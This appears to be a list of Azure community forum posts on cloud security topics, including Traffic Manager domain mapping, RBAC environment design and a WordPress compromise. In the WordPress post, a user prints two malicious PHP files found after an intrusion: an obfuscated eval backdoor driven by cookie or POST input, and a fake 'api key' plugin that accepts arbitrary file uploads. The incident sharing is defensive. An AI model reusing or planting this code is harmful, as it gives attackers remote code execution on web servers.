security
15 Topics

One Traffic Manager and multiple DNS mapping (pls need clarification on how security is ensured)
Hi Team,

I feel really strange about how Azure Traffic Manager allows traffic from multiple custom domains just by adding a CNAME record of the Traffic Manager to them, without enforcing any validation of DNS from the Azure end. Maybe I am wrong, but let me explain in detail.

Here's my setup:

Traffic Manager _____ App Gateway(East) & App Gateway(West) _WebApp (East) & _WebApp(West)

An HA setup with applications in East & West. I've bought a domain from GoDaddy and I added a CNAME record pointing to Traffic Manager (pqr-tm.trafficmanager.net). I did no additional steps for domain validation from Azure. After the DNS propagation happened, the other day when I tried my custom domain (let's say pqr.com), it routed to my WebApp as expected as per the CNAME record.

Now, when I typed http://www.prq.com in https://digwebinterface.com I could see it resolved first to "traffic manager" (it clearly displays my Traffic Manager name), then to the Application Gateway DNS and then to the Application Gateway public IP.

Then my friend said, "I'll do a trick, I'll get into your site without my notice." Here's what he did: he has a domain in Yahoo, let's say xyz.com. He opened his Yahoo account, went to DNS settings, and in the Forward URL option he kept my Traffic Manager DNS name, which clearly appears in https://digwebinterface.com just by typing my website http://www.prq.com in it. To my surprise, within a minute, when he typed xyz.com in the browser, my WebApp started rendering the page.

So I thought, where is the security? Here's my point: https://digwebinterface.com is publicly available; by typing the site name, anyone can get the Traffic Manager URL (if the setup includes it). Then, just by keeping the CNAME in their forward URL, if they are able to map my site... where is the security? Or have I missed any step in Traffic Manager which binds my domain to it, so that if anyone else tries to point their domain to my Traffic Manager, it rejects them? Pls help!!
I've a strong feeling that there will be a tightening point which I am not aware of. Pls guide, Gurus :)

Thanks, Kiran

4.5K Views, 0 likes, 3 Comments

Dev / Test / Prod - Subscription per environment or Resource Group per environment?
Hi,

So looking back 2 years, the general idea was to create a subscription per environment to secure resources from the unintended. However, with the new RBAC model, it now looks like (for small shops) some people are recommending one subscription with a resource group per environment because you can now lock these down via roles. E.g. some devs can't access or even see the "Production" resource group. We are a small startup so we don't want large overheads, but we also don't want to go down some path that will box us in down the track. Does anyone have any words of wisdom?

Cheers, Sam

3.9K Views, 0 likes, 1 Comment

Security on Azure DevOps Self Hosted agent
Hello,

Today I have discovered that it is possible from the pipeline to deploy software directly on the agents without any kind of authentication. In my case I was able to deploy Docker directly on a self-hosted agent by just using a bash script in the pipeline. Is it possible to deny this kind of deployment on a self-hosted agent from the pipeline without impacting any other deployments, pipelines, or releases? From the security perspective, it poses a risk: someone that has access to the pipelines can deploy unwanted software on an agent.

Solved, 3.9K Views, 0 likes, 1 Comment

Users asked for 2nd MFA method
Hi there,

Starting today, a couple of users reported that, seemingly out of the blue, they're being asked to configure a second method for their MFA setup. For example, if a user has configured the MSFT Authenticator app, he will be asked to provide an additional method. This doesn't seem to be widespread yet and we couldn't reproduce it thus far. Perhaps one of you knows what could be causing this.

Thanks.

Solved, 2.8K Views, 0 likes, 3 Comments

Azure Bastion - News Comics
You are a Cloud lover? But you prefer Azure? Learning with fun? And most of all, you like establishing connections? (link removed by moderator)

If you want to deep dive, do not hesitate to visit the official documentation on the Microsoft website: https://learn.microsoft.com/en-us/azure/bastion/bastion-overview (link removed by moderator)

2K Views, 1 like, 2 Comments

Malware Wordpress on Azure
Recently received a security alert on a WordPress webapp running on Azure:

1. There was a non-recognized authentication as admin user
2. The user uploaded a .zip file to the plugins folder that contained 2 files: map.php and apikey.php
3. The user performed a "test" through the "plugin"

Example of the code map.php:

<?php $GLOBALS['_79565595_']=Array('str_' .'rot13','pack','st' .'rrev'); ?><?php function _1178619035($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*");return $a[$i];} ?><?php function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];}$_1=l__0(_1178619035(0)) .l__0(_1178619035(1)) .l__0(_1178619035(2)) .l__0(_1178619035(3));if(!empty($_1)){$_1=$GLOBALS['_79565595_'][0](@$GLOBALS['_79565595_'][1](_1178619035(4),$GLOBALS['_79565595_'][2]($_1)));if(isset($_1)){@eval($_1);exit();}}

Example of code apikey.php:

<?php /** * @package api key */ /* Plugin Name: api key */ if ("hello"==$_GET["test"]) { echo "testtrue"; } if(is_uploaded_file($_FILES["filename"]["tmp_name"])) { move_uploaded_file($_FILES["filename"]["tmp_name"],$_FILES["filename"]["name"]); echo "true"; }

Image of the "Plugin" on the WordPress site:

Sucuri sent out an alert that the .zip file was uploaded to the site. At this point there is no easy way to find the affected files on a WordPress installation, even using some tools like the Sucuri scanner tool online.

Recommendations:

. Enable Sucuri plugin on your WP
. Enable WAF v2 on your webapp
. If possible isolate your resource using App Service Environment
. Harden NSG(s)
. Perform an SSL test on your web app

If you have any other tip or recommendation please share!

1.9K Views, 0 likes, 2 Comments

Bug: Function apps IP Restrictions blocks portal UI
I noticed that if you set an IP restriction on an Azure Function app, you block the Azure Functions portal user interface at the same time.

Original goal

I found this bug while trying to restrict IP addresses to Logic Apps in my region (Western Europe).

Error message

Error: The function runtime is unable to start. Please check the runtime logs for any errors or try again later.

Reproduce

1. Create a Function app
2. Go to Function Apps -> Platform features -> All settings -> Networking -> IP Restrictions
3. Add a rule, for example: IP address 40.68.222.65 (Logic Apps in Western Europe)
4. Go back to Function Apps
5. Error message appears

1.4K Views, 0 likes, 0 Comments

How to redirect from one URL to another URL adding a security token?
I would like to know if there is any way with Azure Functions, Proxy... to redirect from one URL to another URL adding the accessToken. I'm looking for something like this:

https://myexample.azuresite.net/ -> redirect + adding security -> https://www.myexample.com/oauthCallback.html?token=

Could you help me?

Regards

1.4K Views, 0 likes, 0 Comments

Meetup: Deep dive into the new Azure Sentinel service!
If you are based in London or will be there on October 23, our Azure Sentinel team will co-host a free “Deep dive into the new Azure Sentinel service” meetup in the month of October.

Meetup name: Deep dive into the new Azure Sentinel service
Cost: Free
Date: October 23rd, 2019
Time and Duration: 18:00 – 21:00
Location: The Microsoft Reactor London, 70 Wilson St. - London, UK
Registration: https://lnkd.in/gvRTgpz

There is a maximum capacity of 100 attendees, so if interested we suggest registering now.

1.3K Views, 1 like, 0 Comments

Executive Customer Meetings (Security) at Microsoft Ignite the Tour in Washington, DC
We are providing the opportunity for US GCC High customers to request on-site meetings with Microsoft Cloud Security General Manager, Asaf Kashi, during Microsoft Ignite the Tour in Washington, DC on Feb 6-7, 2020. Details and signup here!

999 Views, 0 likes, 1 Comment